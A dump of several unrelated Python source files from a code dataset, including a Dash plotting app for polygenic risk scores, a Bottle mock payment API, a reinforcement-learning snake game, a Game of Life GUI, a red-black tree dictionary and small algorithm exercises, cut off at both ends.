'options')])\ndef set_snps_value(available_options):\n return available_options[0]['value']\n\n\n@app.callback(\n Output('stat-display-value', 'children'),\n [Input('disease-dropdown', 'value'),\n Input('snps-dropdown', 'value')])\ndef display_value(disease, snps):\n x1 = np.linspace(means[snps][0] - 3*stdevs[snps][0], means[snps][0] + 3*stdevs[snps][0], 100)\n x2 = np.linspace(means[snps][1] - 3*stdevs[snps][1], means[snps][1] + 3*stdevs[snps][1], 100)\n x3 = np.linspace(means[snps][2] - 3*stdevs[snps][2], means[snps][2] + 3*stdevs[snps][2], 100)\n ol1 = 100*NormalDist(means[snps][0], stdevs[snps][0]).overlap(NormalDist(means[snps][1], stdevs[snps][1]))\n ol1 = round(ol1,1)\n ol2 = 100*NormalDist(means[snps][0], stdevs[snps][0]).overlap(NormalDist(means[snps][2], stdevs[snps][2]))\n ol2 = round(ol2,1)\n return [dcc.Graph(\n figure={\n 'data':[\n {\n 'name': genotype[snps][0],\n 'type': 'line',\n 'x': x1,\n 'y': stats.norm.pdf(x1,means[snps][0], stdevs[snps][0])\n },\n\n {\n 'name': genotype[snps][1],\n 'type': 'line',\n 'x': x2,\n 'y': stats.norm.pdf(x2,means[snps][1], stdevs[snps][1])\n },\n\n {\n 'name': genotype[snps][2],\n 'type': 'line',\n 'x': x3,\n 'y': stats.norm.pdf(x3,means[snps][2], stdevs[snps][2])\n }\n ],\n 'layout': {\n 'title': 'Normal distributions of {} variants'.format(snps),\n 'yaxis':{\n 'title':'Density'\n },\n 'xaxis':{\n 'title':'Polygenic Risk Score'\n }\n }\n }\n ),\n html.H4('Overlap of single mutation {} and wild type {} is {}%'.format(genotype[snps][1],genotype[snps][0],ol1)),\n html.H4('Overlap of double mutation {} and wild type {} is {}%'.format(genotype[snps][2],genotype[snps][0],ol2)),\n html.Br(),\n dcc.Graph(\n figure={\n 'data':[\n {\n 'name': score[disease][k]+'',\n 'type': 'violin',\n 'y': np.random.normal(amean[disease][k], astdev[disease][k], 1000)\n } for k in range(len(score[disease]))\n ],\n 'layout': {\n 'title': 'Polygenic risk scores distributuion of {}'.format(disease),\n 'yaxis':{\n 'title':ylabel[disease]\n },\n 'xaxis':{\n 'title':xlabel[disease]\n }\n }\n }\n )\n ]\n","sub_path":"app/multi_page/apps/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"478022821","text":"import json\n\nimport bottle\n\nimport _responses\n\n\nSERIALIZERS = {\n 'application/json': json.dumps,\n }\n\n\napp = bottle.Bottle()\n\n\n@app.get('/marketplaces//accounts/')\ndef marketplace_accounts(mp_eid, ac_eid):\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n the_response = _responses.accounts.show(mp_eid, ac_eid)\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.get('/merchants')\ndef merchants_index():\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n the_response = _responses.merchants.index()\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.get('/marketplaces')\ndef marketplaces_index():\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n limit = int(bottle.request.query.limit or 10)\n offset = int(bottle.request.query.offset or 0)\n num = int(bottle.request.query.num or 1)\n pages = int(bottle.request.query.pages or 1)\n the_response = _responses.marketplaces.index(limit, offset, num, pages)\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.post('/marketplaces')\ndef marketplaces_create():\n bottle.response.status = 201\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n if not bottle.request.auth:\n the_response = _responses.marketplaces.anonymous_create()\n else:\n the_response = _responses.marketplaces.anonymous_create()\n\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.put('/marketplaces/<_eid>')\ndef marketplaces_put(_eid):\n return marketplaces_create()\n\n\n@app.post('/api_keys')\ndef api_keys():\n bottle.response.status = 302\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n bottle.response.set_header('Location', '/v1/your-mom')\n bottle.response.body = json.dumps('')\n return bottle.response\n\n\n@app.get('/marketplaces/<_eid>/transactions')\ndef marketplaces_transactions(_eid):\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n limit = int(bottle.request.query.limit or 10)\n offset = int(bottle.request.query.offset or 0)\n the_response = _responses.transactions.index(limit, offset)\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\napp.mount('/v1', app)\n","sub_path":"tests/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"158010026","text":"# coding=utf8\n\nimport path\nfrom ..commons.common import MyTask\nfrom .processors import VideoUnfold4Fog\nfrom recognition_pre_fog_batch.etl_video.preparation import ProjParaShop\n\n\nclass VideoETLTask(MyTask):\n \"\"\"\n use the Processor to make task,maybe several Processors are needed!\n we intend to use the Task Object to solve the inter tasks dependency!\n tasks sometimes cost much time and resources!\n This layer try to wrap the Processor to Task,making them to have some more characteristics\n then facilitate the scheduler because of the exposed methods for the scheduler!\n \"\"\"\n def __init__(self, reset=True):\n self.__reset = reset\n self.input = True\n\n def require(self,var):\n \"\"\"\n 本方法执行除execute主体以外的预处理工作。\n 检查当前执行的条件是否满足,其中的主要条件指的是依赖,而不是时机等条件。\n 条件被满足与否,首先要判断存在与否,若存在需要进一步判断条件的特性是否满足处理的要求。\n 执行依赖条件检查,增强程序的稳健性,程序前端入口把关越严,后端需要处理的异常就会降低许多!\n \"\"\"\n p1 = path.Path(ProjParaShop.MODIFIED_VIDEO_PATH)\n p2 = path.Path(ProjParaShop.UNFOLD_VIDEO_SAVE_PATH)\n p1.makedirs_p()\n print(p1)\n p2.makedirs_p()\n if not p1.listdir():\n print(\"输入文件夹是空的,不能继续执行,请满足第一个依赖条件!\")\n self.input = False\n else:\n print(\"输入文件夹是非空,可继续执行,第一个依赖条件满足!\")\n if self.__reset:\n print(\"执行本模块!\")\n self.input = True\n else:\n print(\"不执行本模块!\")\n self.input = False\n\n def output(self, var):\n \"\"\"\n 本方法执行除execute主体以外的善后工作。\n \"\"\"\n print(self.__class__.__name__, \": 任务成功完成!\")\n\n def execute(self, msg):\n \"\"\"\n 程序本体逻辑\n \"\"\"\n if self.input:\n processor = VideoUnfold4Fog(ProjParaShop.MODIFIED_VIDEO_PATH, ProjParaShop.UNFOLD_VIDEO_SAVE_PATH)\n processor.process(msg)\n self.output(None) # 无条件输出\n\n","sub_path":"resources/recognition_pre_fog/etl_video/tasks_graph.py","file_name":"tasks_graph.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"352968103","text":"\"\"\"\n:Author: Pravallika\n:Description: Say you have an array for which the ith element is the price of a given stock on day i.\n\n\t\tIf you were only permitted to complete at most one transaction (ie, buy one and sell one share of the stock), design an algorithm to find the maximum profit.\n:Explanation: nput: [7, 1, 5, 3, 6, 4]\n\t\tOutput: 5\n\n\t\tmax. difference = 6-1 = 5 (not 7-1 = 6, as selling price needs to be larger than buying price)\n\"\"\"\n\nclass Stocks(object):\n\tdef sellStocks(self, nums):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tmin = nums[0]\n\t\tmax = 0\n\t\t\n\t\tfor cost in nums:\n\t\t\tif cost < min:\n\t\t\t\tmin = cost\n\t\t\tif cost-min > max:\n\t\t\t\tmax = cost-min\n\n\t\treturn max\n\n\nstock = Stocks()\nnums = [7,1,5,3,6,4]\nprint(stock.sellStocks(nums))\n","sub_path":"Arrays/leetcode/bestTimeSellSticks/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113615906","text":"import random\nfrom NeuralNet.ReinforcementNN import *\nfrom torch.distributions import Categorical\nimport torch\n\n\nclass BrainSnake:\n def __init__(self, _id, gen=-1, width=500, height=500, network_layout=None):\n self.MaxWidth = width\n self.MaxHeight = height\n\n self.head = [50, 50]\n self.body = [[50, 50], [40, 50], [30, 50]]\n self.direction = \"RIGHT\"\n self.direction_map = {1: \"RIGHT\", 2: \"DOWN\", 3: \"LEFT\", 4: \"UP\"}\n self.dirNeural = 0\n self.is_alive = True\n\n self.steps = 0\n self.score = 0\n self.time_to_live = 130\n\n self.threshold = 0.6\n self.scale = 10\n\n self.foodLoc = [-1, -1]\n self.food_on_screen = False\n self.dst_to_food = 0\n\n self.ID = _id\n self.gen = gen\n\n self.brain_input = [0.5] * 11\n self.food_quadrant = [-1, -1]\n self.obstacles = [0] * 8\n self.closest_obstacle = [0] * 8\n self.wall_array = []\n\n self.rewards = []\n self.global_fitness = 0\n\n self.sqrt2 = np.sqrt(2)\n\n self.set_walls()\n self.spawn_food()\n\n self.brain = Policy()\n self.generate_brain_input()\n self.optimizer = optim.Adam(self.brain.parameters(), lr=0.01)\n self.eps = np.finfo(np.float32).eps.item()\n\n def get_head_pos(self):\n return self.head\n\n def get_body(self):\n return self.body\n\n def get_food_pos(self):\n return self.foodLoc\n\n def set_walls(self):\n self.wall_array = []\n for i in range(0, self.MaxHeight, 10):\n self.wall_array.append([-10, i])\n self.wall_array.append([self.MaxWidth, i])\n for i in range(0, self.MaxWidth, 10):\n self.wall_array.append([i, -10])\n self.wall_array.append([i, self.MaxHeight])\n\n def select_action(self):\n probs = self.brain(torch.Tensor(self.brain_input))\n # if (probs[0] > 0 and probs[1] > 0) or (probs[0] <0 and probs[1] < 0):\n m = Categorical(probs)\n action = m.sample([2])\n self.brain.saved_log_probs.append(m.log_prob(action))\n return action\n\n def finish_episode(self):\n R = 0\n policy_loss = []\n rewards = []\n for r in self.brain.rewards[::-1]:\n R = r + 0.99 * R\n rewards.insert(0, R)\n rewards = torch.tensor(rewards)\n print(\" std\",rewards.std())\n rewards = (rewards - rewards.mean()) / (rewards.std() + self.eps)\n print(\"reward\", rewards)\n for log_prob, reward in zip(self.brain.saved_log_probs, rewards):\n policy_loss.append(-log_prob * reward)\n self.optimizer.zero_grad()\n policy_loss = torch.cat(policy_loss).sum()\n print(\" pol: {} \\n\".format(policy_loss))\n policy_loss.backward()\n self.optimizer.step()\n del self.brain.rewards[:]\n del self.brain.saved_log_probs[:]\n\n def set_direction(self):\n action = self.select_action()\n cur_dir = None\n if action[0] == 1 and action[1] == 0:\n next_dir = \"LEFT\"\n elif action[0] == 0 and action[1] == 1:\n next_dir = \"RIGHT\"\n else:\n next_dir = None\n for i in self.direction_map:\n if self.direction_map[i] == self.direction:\n cur_dir = i\n break\n if next_dir == \"LEFT\":\n cur_dir -= 1\n elif next_dir == \"RIGHT\":\n cur_dir += 1\n else:\n cur_dir = cur_dir\n\n if cur_dir < 1:\n cur_dir = 4\n elif cur_dir > 4:\n cur_dir = 1\n\n self.direction = self.direction_map[cur_dir]\n # if new_direction == 'RIGHT' and not self.direction == 'LEFT':\n # self.direction = new_direction\n # if new_direction == 'LEFT' and not self.direction == 'RIGHT':\n # self.direction = new_direction\n # if new_direction == 'UP' and not self.direction == 'DOWN':\n # self.direction = new_direction\n # if new_direction == 'DOWN' and not self.direction == 'UP':\n # self.direction = new_direction\n\n def move(self):\n self.generate_brain_input()\n self.set_direction()\n if self.direction == \"RIGHT\":\n self.head[0] += 10\n if self.direction == \"LEFT\":\n self.head[0] -= 10\n if self.direction == \"DOWN\":\n self.head[1] += 10\n if self.direction == \"UP\":\n self.head[1] -= 10\n self.steps += 1\n self.time_to_live -= 1\n self.body.insert(0, list(self.head))\n self.check_collision()\n self.give_reward()\n self.update_fitness()\n if self.steps % 5 == 0:\n self.finish_episode()\n if self.head == self.foodLoc:\n self.score += 1\n self.time_to_live = 10 * len(self.body) + 100\n self.food_on_screen = False\n self.spawn_food()\n return 1\n else:\n self.body.pop()\n return 0\n\n def check_collision(self):\n obst = self.wall_array + self.body[1:]\n if self.head in obst:\n self.terminate()\n return 1\n return 0\n\n def terminate(self):\n self.is_alive = False\n self.finish_episode()\n\n def spawn_food(self):\n if not self.food_on_screen:\n self.foodLoc = [random.randrange(0, self.MaxWidth / 10) * 10, random.randrange(0, self.MaxHeight / 10) * 10]\n self.food_on_screen = True\n\n def locate_food(self):\n if self.head[0] > self.foodLoc[0]:\n self.food_quadrant[0] = 1\n else:\n self.food_quadrant[0] = 0\n\n if self.head[1] > self.foodLoc[1]:\n self.food_quadrant[1] = 0\n else:\n self.food_quadrant[1] = 1\n\n a = self.head[0] - self.foodLoc[0]\n b = self.head[1] - self.foodLoc[1]\n self.dst_to_food = np.sqrt(a ** 2 + b ** 2)\n\n def detect_obstacles(self):\n obstacle_array = self.body[1:] + self.wall_array\n\n north = []\n northeast = []\n east = []\n southeast = []\n south = []\n southwest = []\n west = []\n northwest = []\n\n for item in obstacle_array:\n if self.head[0] == item[0] and self.head[1] - item[1] > 0:\n north.append(self.head[1] - item[1])\n elif self.head[0] == item[0] and item[1] - self.head[1] > 0:\n south.append(item[1] - self.head[1])\n elif self.head[1] == item[1] and item[0] - self.head[0] > 0:\n east.append(item[0] - self.head[0])\n elif self.head[1] == item[1] and self.head[0] - item[0] > 0:\n west.append(self.head[0] - item[0])\n\n elif self.head[1] - item[1] == self.head[0] - item[0] and (self.head[1] - item[1]) * self.sqrt2 > 0:\n northwest.append((self.head[1] - item[1]) * self.sqrt2)\n elif item[1] - self.head[1] == self.head[0] - item[0] and (item[1] - self.head[1]) * self.sqrt2 > 0:\n southwest.append((item[1] - self.head[1]) * self.sqrt2)\n elif item[1] - self.head[1] == item[0] - self.head[0] and (item[1] - self.head[1]) * self.sqrt2 > 0:\n southeast.append((item[1] - self.head[1]) * self.sqrt2)\n elif self.head[1] - item[1] == item[0] - self.head[0] and (self.head[1] - item[1]) * self.sqrt2 > 0:\n northeast.append((self.head[1] - item[1]) * self.sqrt2)\n\n obstacle_north = min(north) if len(north) is not 0 else -1\n obstacle_north_east = min(northeast) if len(northeast) is not 0 else -1\n obstacle_east = min(east) if len(east) is not 0 else -1\n obstacle_south_east = min(southeast) if len(southeast) is not 0 else -1\n obstacle_south = min(south) if len(south) is not 0 else -1\n obstacle_west = min(west) if len(west) is not 0 else -1\n obstacle_south_west = min(southwest) if len(southwest) is not 0 else -1\n obstacle_north_west = min(northwest) if len(northwest) is not 0 else -1\n\n self.closest_obstacle = [self.scale / obstacle_north, self.scale / obstacle_north_east, self.scale / obstacle_east,\n self.scale / obstacle_south_east,\n self.scale / obstacle_south,\n self.scale / obstacle_south_west, self.scale / obstacle_west, self.scale / obstacle_north_west]\n\n def generate_brain_input(self):\n self.locate_food()\n self.detect_obstacles()\n self.brain_input = self.closest_obstacle + self.food_quadrant + [(self.scale / self.dst_to_food)]\n\n def update_global_fitness(self):\n pass\n\n def give_reward(self):\n prev_dst = self.dst_to_food\n self.locate_food()\n progress = prev_dst - self.dst_to_food\n print(\" prog\",progress)\n if progress < 0:\n progress = progress * 2\n print(\" progress\", progress)\n reward = progress\n self.brain.rewards.append(reward)\n\n def update_fitness(self):\n self.update_global_fitness()\n","sub_path":"Snake/RLBrainySnake.py","file_name":"RLBrainySnake.py","file_ext":"py","file_size_in_byte":9077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"92019118","text":"#!/usr/bin/env python\n\nfrom Tkinter import *\nimport math\n\nGRID_RANGE = 10\n\ndef xy_to_cell_coord(x, y, zoom):\n return(math.ceil((x-2) / zoom), math.ceil((y-2) / zoom )) \n\ndef grid_centre(x, y, width, height):\n return(int(x) + (width / 2), int(y) + (height / 2))\n\ndef grid_range(x, y, width, height, factor, zoom):\n startx = x - width*factor\n starty = y - height*factor\n endx = x + width*factor\n endy = y + height*factor\n return (startx - startx%zoom + 1, starty - starty%zoom +1, endx, endy)\n\nclass LifeCanvas:\n def __init__(self, parent, zoom, width, height):\n self._zoom = zoom\n self._width = width\n self._height = height\n self._engine = LifeEngine(set())\n\n self._frame = Frame(parent)\n self._frame.pack()\n\n self._scrollregion = [-GRID_RANGE * width, -GRID_RANGE * height,\n GRID_RANGE * width, GRID_RANGE * height]\n\n self._canvas=Canvas(self._frame, scrollregion=self._scrollregion,\n width=self._width, height=self._height, bg='white')\n\n self._vertscroll = Scrollbar(self._frame, orient=VERTICAL,\n command=self.yscrollbar)\n self._vertscroll.pack(side=RIGHT, fill=Y)\n\n self._canvas.pack() \n\n self._horiscroll = Scrollbar(self._frame, orient=HORIZONTAL,\n command=self.xscrollbar)\n self._horiscroll.pack(fill=X) \n \n self._canvas.config(xscrollcommand=self._horiscroll.set,\n yscrollcommand=self._vertscroll.set)\n \n self._canvas.bind(\"\", self.select_cell)\n\n def xscrollbar(self, arg1, arg2, arg3):\n x,y = grid_centre(self._canvas.canvasx( 0 ),\n self._canvas.canvasy( 0 ),\n self._width, self._height)\n range_width = ( GRID_RANGE-2 ) * self._width\n\n if self._centrex - range_width < x < self._centrex + range_width:\n pass\n else:\n if int( arg2 ) > 0:\n self._scrollregion[2] += range_width\n else:\n self._scrollregion[0] -= range_width\n\n self._canvas.config( scrollregion=self._scrollregion )\n self.redraw()\n\n self._canvas.xview(arg1, arg2, arg3)\n\n def yscrollbar(self, arg1, arg2, arg3):\n x,y = grid_centre(self._canvas.canvasx( 0 ),\n self._canvas.canvasy( 0 ),\n self._width, self._height)\n\n range_height = ( GRID_RANGE-2 ) * self._height\n\n if self._centrey - range_height < y < self._centrey + range_height:\n pass\n else:\n if int( arg2 ) > 0:\n self._scrollregion[3] += range_height\n else:\n self._scrollregion[1] -= range_height\n\n self._canvas.config(scrollregion=self._scrollregion)\n self.redraw()\n\n self._canvas.yview(arg1, arg2, arg3)\n\n def redraw(self):\n self._canvas.delete(ALL)\n self.draw_grid()\n self.draw_cells(self._engine.get_cells())\n\n def select_cell(self, event):\n coord = xy_to_cell_coord(self._canvas.canvasx(event.x),\n self._canvas.canvasy(event.y), self._zoom)\n colour = 'blue' if self._engine.toggle_cell(coord) else 'white' \n self.draw_single_cell(coord[0], coord[1], colour)\n \n def set_zoom(self, zoom):\n self._zoom = zoom\n\n def run_turn(self):\n self.clear_cells(self._engine.get_cells())\n self.draw_cells(self._engine.run_next_turn())\n\n def draw_grid(self):\n self._centrex, self._centrey = grid_centre(self._canvas.canvasx(0),\n self._canvas.canvasy(0),\n self._width, self._height)\n \n startx, starty, endx, endy = grid_range(self._centrex,\n self._centrey,\n self._width, self._height,\n GRID_RANGE, self._zoom)\n\n for x in range(startx, endx, self._zoom):\n self._canvas.create_line(x,starty, x, endy)\n for y in range(starty, endy, self._zoom):\n self._canvas.create_line(startx, y, endx, y)\n\n def draw_single_cell(self, x, y, fillcolour):\n self._canvas.create_rectangle(( x-1 ) * self._zoom + 2,\n ( y-1 ) * self._zoom + 2,\n x*self._zoom + 1,\n y*self._zoom + 1,\n fill=fillcolour, width=0 )\n\n def draw_cells(self, cells):\n for x, y in cells:\n self.draw_single_cell(x, y, 'blue');\n\n def clear_cells( self, cells ):\n for x, y in cells:\n self.draw_single_cell(x, y, 'white');\n\n\nclass LifeGui:\n def __init__(self, zoom, width, height, timeout):\n self._root = Tk()\n self._zoom = IntVar(self._root)\n self._zoom.set(zoom)\n self._timeout = IntVar(self._root)\n self._timeout.set(timeout)\n self._job = None\n\n self.initialise(width, height)\n\n def initialise(self, width, height):\n self._root.title(\"Lython\")\n\n self._canvas = LifeCanvas(self._root, self._zoom.get(), width, height)\n\n self._gobutton = Button(self._root, text=\"GO\", command=self.gobutton)\n self._gobutton.pack(side=LEFT)\n\n self._stepbutton = Button(self._root, text=\"STEP\",\n command=self.stepbutton)\n self._stepbutton.pack(side=RIGHT)\n \n self._zoomscale = Scale(self._root, variable=self._zoom, label=\"Zoom\",\n command=self.zoomadjust, orient=HORIZONTAL,\n from_=2)\n self._zoomscale.pack(side=LEFT)\n\n self._timescale = Scale(self._root, variable= self._timeout,\n label=\"Time (ms)\", command=self.timescale,\n orient=HORIZONTAL,\n from_=10, to=2000, resolution=10)\n self._timescale.pack(side=RIGHT)\n\n self._canvas.redraw()\n mainloop()\n \n def gobutton(self):\n if (self._gobutton[\"text\"] == \"GO\"):\n self.run_life()\n self._gobutton[\"text\"] = \"STOP\"\n else:\n self._root.after_cancel(self._job) \n self._gobutton[\"text\"] = \"GO\"\n\n def stepbutton(self):\n self._canvas.run_turn()\n\n def timescale(self, event):\n if (self._gobutton[\"text\"] == \"GO\" and self._job ):\n self._root.after_cancel(self._job)\n self.run_life()\n\n def zoomadjust(self, event):\n self._canvas.set_zoom(self._zoom.get())\n self._canvas.redraw()\n\n def run_life(self):\n self._canvas.run_turn()\n self._job = self._root.after(self._timeout.get(), self.run_life)\n \n\nclass LifeEngine:\n def __init__(self, live_cells):\n self._live_cells = live_cells\n \n def count_live_cells(self, coordx, coordy):\n return sum(1 for x in range(-1, 2) for y in range(-1, 2)\n if not x == y == 0 and (coordx + x, coordy + y) in self._live_cells)\n\n def comes_alive(self, coordx, coordy):\n live_cells = self.count_live_cells(coordx, coordy)\n if (coordx, coordy) in self._live_cells:\n return live_cells in ( 2, 3 )\n else:\n return live_cells == 3\n\n def run_next_turn(self):\n adjacent = set()\n for node in self._live_cells:\n [adjacent.add( (x + node[0], y + node[1]))\n for x in range(-1, 2) for y in range(-1, 2)]\n alivenext = {i for i in adjacent if self.comes_alive(i[0], i[1])}\n self._live_cells = alivenext\n return self._live_cells\n\n def get_cells(self):\n return self._live_cells\n\n def toggle_cell(self, coord):\n if coord in self._live_cells:\n self._live_cells.remove(coord)\n return False\n else:\n self._live_cells.add(coord)\n return True\n\n# Main\n\ndef main():\n mygui = LifeGui(10, 702, 502, 100)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"python/lython.py","file_name":"lython.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"285725906","text":"\"\"\"\nA Dict and Set implementation which always iterate in order.\n\n`SortedDict` and `SortedSet` are red-black tree-based collections, which store\ntheir keys according to their native Python sort order. This means iteration\n(i.e. `for key in dictionary:`, or `for value in set:`) always produces the\nkeys in order.\n\"\"\"\n\nimport collections\n\nfrom crbtree._rbtree import ffi, lib\n\n__all__ = ['SortedDict']\n\n\nItem = collections.namedtuple('Item', ('key', 'value'))\n\n\nclass SortedDict(collections.MutableMapping):\n\n \"A sorted dictionary, backed by a red-black tree.\"\n\n def __init__(self, *args, **kwargs):\n self._rbtree = lib.rb_tree_create(lib.rb_tree_node_compare)\n # This allows us to get the SortedDict Python object from a node\n # removal/dealloc callback.\n self._self_handle = ffi.new_handle(self)\n self._rbtree.info = self._self_handle\n # Track the FFI pointers to Items so they don't get garbage collected.\n self._handles = set()\n for key, value in kwargs.items():\n self[key] = value\n \n if args:\n try:\n if isinstance(args[0], list):\n for item in args[0]:\n self[item[0]] = item[1]\n elif isinstance(args[0], dict):\n for key, value in args[0].items():\n self[key] = value\n else:\n raise ValueError\n except Exception:\n raise TypeError(f'Can\\'t insert type {type(args[0])}')\n \n\n def __del__(self):\n lib.rb_tree_dealloc(self._rbtree, ffi.addressof(\n lib, 'rb_tree_node_dealloc_cb'))\n\n def __len__(self):\n return lib.rb_tree_size(self._rbtree)\n\n def _get(self, key):\n item = Item(key, None) # Create item\n item_p = ffi.new_handle(item) # Get its pointer\n result_p = lib.rb_tree_find(\n self._rbtree, item_p) # Send to command to c\n if result_p == ffi.NULL: # Compare to C NULL\n return (False, None)\n return (True, ffi.from_handle(result_p).value)\n\n def __contains__(self, key):\n return self._get(key)[0]\n\n def __setitem__(self, key, value):\n if key in self:\n del self[key]\n item = Item(key, value)\n item_p = ffi.new_handle(item)\n self._handles.add(item_p)\n if not lib.rb_tree_insert(self._rbtree, item_p):\n raise RuntimeError(\n \"Unexpected error inserting key {!r}\".format(key))\n\n def __getitem__(self, key):\n found, item = self._get(key)\n if found:\n return item\n raise KeyError(key)\n\n def __delitem__(self, key):\n if key not in self:\n raise KeyError(key)\n item = Item(key, None)\n item_p = ffi.new_handle(item)\n removed = lib.rb_tree_remove_with_cb(\n self._rbtree, item_p, lib.rb_tree_node_was_removed)\n if not removed:\n raise RuntimeError(\n \"Unexpected error removing key {!r}\".format(key))\n\n def __iter__(self):\n for key, _ in self._iter():\n yield key\n\n def __eq__(self, other):\n return len(self) == len(other) and sorted_mapping_eq(self, other)\n\n def keys(self):\n for key, _ in self.items():\n yield key\n\n def values(self):\n for _, value in self.items():\n yield value\n\n def _iter(self):\n rb_iter = lib.rb_iter_create()\n try:\n item_p = lib.rb_iter_first(rb_iter, self._rbtree)\n while item_p != ffi.NULL:\n item = ffi.from_handle(item_p)\n yield (item.key, item.value)\n item_p = lib.rb_iter_next(rb_iter)\n finally:\n lib.rb_iter_dealloc(rb_iter)\n\n def items(self):\n return self._iter()\n\n def __repr__(self) -> str:\n st = '{'\n for key, value in self.items():\n st += f\"'{key}': {value}, \"\n st = st.strip(', ') + '}'\n return st\n\n\n@ffi.def_extern()\ndef rb_tree_node_compare(rb_tree_p, rb_node_a, rb_node_b):\n a, b = ffi.from_handle(rb_node_a.value), ffi.from_handle(rb_node_b.value)\n if a.key == b.key:\n return 0\n if a.key < b.key:\n return -1\n return 1\n\n\n@ffi.def_extern()\ndef rb_tree_node_was_removed(rb_tree_p, rb_node_p):\n ffi.from_handle(rb_tree_p.info)._handles.discard(rb_node_p.value)\n lib.rb_tree_node_dealloc_cb(rb_tree_p, rb_node_p)\n\n\ndef sorted_mapping_eq(map1, map2):\n return all(\n k1 == k2 and v1 == v2\n for (k1, v1), (k2, v2)\n in zip(map1.items(), map2.items()))\n","sub_path":"crbtree/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"560931481","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the sherlockAndAnagrams function below.\ndef sherlockAndAnagrams(s):\n n = len(s)\n res = 0\n for l in range(1, n):\n cnt = {}\n for i in range(n - l + 1):\n subs = list(s[i:i + l])\n subs.sort()\n subs = ''.join(subs)\n if subs in cnt:\n cnt[subs] += 1\n else:\n cnt[subs] = 1\n res += cnt[subs] - 1\n return res\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n s = input()\n\n result = sherlockAndAnagrams(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","sub_path":"Python3/Sherlock and Anagrams/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"399207126","text":"# this files contains basic metadata about the project. This data will be used\n# (by default) in the base.html and index.html\n\nPROJECT_METADATA = {\n 'title': 'Reading in the Alps - Metadata',\n 'author': 'Peter Andorfer',\n 'subtitle': 'Private book ownership in the Catholically dominated Central Alps 1750–1800.\\\n A systematic study based on inventories from the Tyrolean Pustertal and Stubaital',\n 'description': 'The project aims at investigating private book ownership in the Catholically\\\n dominated rural areas of the Central Alps, or, putting it more precisely,\\\n in historic Tyrol in the 18th century. This dedicated web application is meant for managing, publishing and anlayzing metadata of the inventories processed in the project.',\n 'github': 'https://github.com/acdh-oeaw/metarita',\n 'purpose_de': 'Ziel ist du Publikation von Forschungsdaten.',\n 'purpose_en': 'The purpose of this website is the publication of research data.',\n 'version': '0.0.1',\n 'matomo_id': '81',\n 'matomo_url': '//piwik.apollo.arz.oeaw.ac.at/'\n}\n","sub_path":"webpage/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"211735415","text":"\"\"\"\nBuild Order\n\nYou are given a list of projects and a list of dependencies (which is a list of pairs of projects, where\nthe second project is dependent on the first project).\n\nAll project's dependencies must be built before the project is. Find a build order that will allow\nthe projects to be built. If there is no valid build order return an error.\n\nEx:\n\nInput\n projects: a, b, c, d, e, f\n dependencies: (a, d), (f, b), (b, d), (f, a), (d, c)\n\nOutput\n f, e, a, b, d, c\n\n\"\"\"\n\n\nclass Graph:\n def __init__(self):\n self.nodes = []\n self.mapping = {}\n\n def add_edge(self, start_name, end_name):\n start = self.get_or_create_node(start_name)\n end = self.get_or_create_node(end_name)\n\n start.add_neighbor(end)\n\n def get_or_create_node(self, name):\n if name not in self.mapping:\n node = Project(name)\n self.nodes.append(node)\n self.mapping[name] = node\n return self.mapping[name]\n\n def __str__(self):\n return f\"{self.nodes}\"\n\n\nclass Project:\n def __init__(self, name):\n self.name = name\n self.children = []\n self.mapping = {}\n self.dependencies = 0\n self.state = None\n\n def add_neighbor(self, node):\n if node.name not in self.mapping:\n self.children.append(node)\n self.mapping[node.name] = node\n node.dependencies += 1\n\n def __repr__(self):\n return f\"\"\n\n\ndef solution(projects, dependencies):\n graph = build_graph(projects, dependencies)\n return order_projects(graph.nodes)\n\n\ndef dfs_solution(projects, dependencies):\n graph = build_graph(projects, dependencies)\n return order_projects_dfs(graph.nodes)\n\n\ndef build_graph(projects, dependencies):\n graph = Graph()\n\n for first, second in dependencies:\n 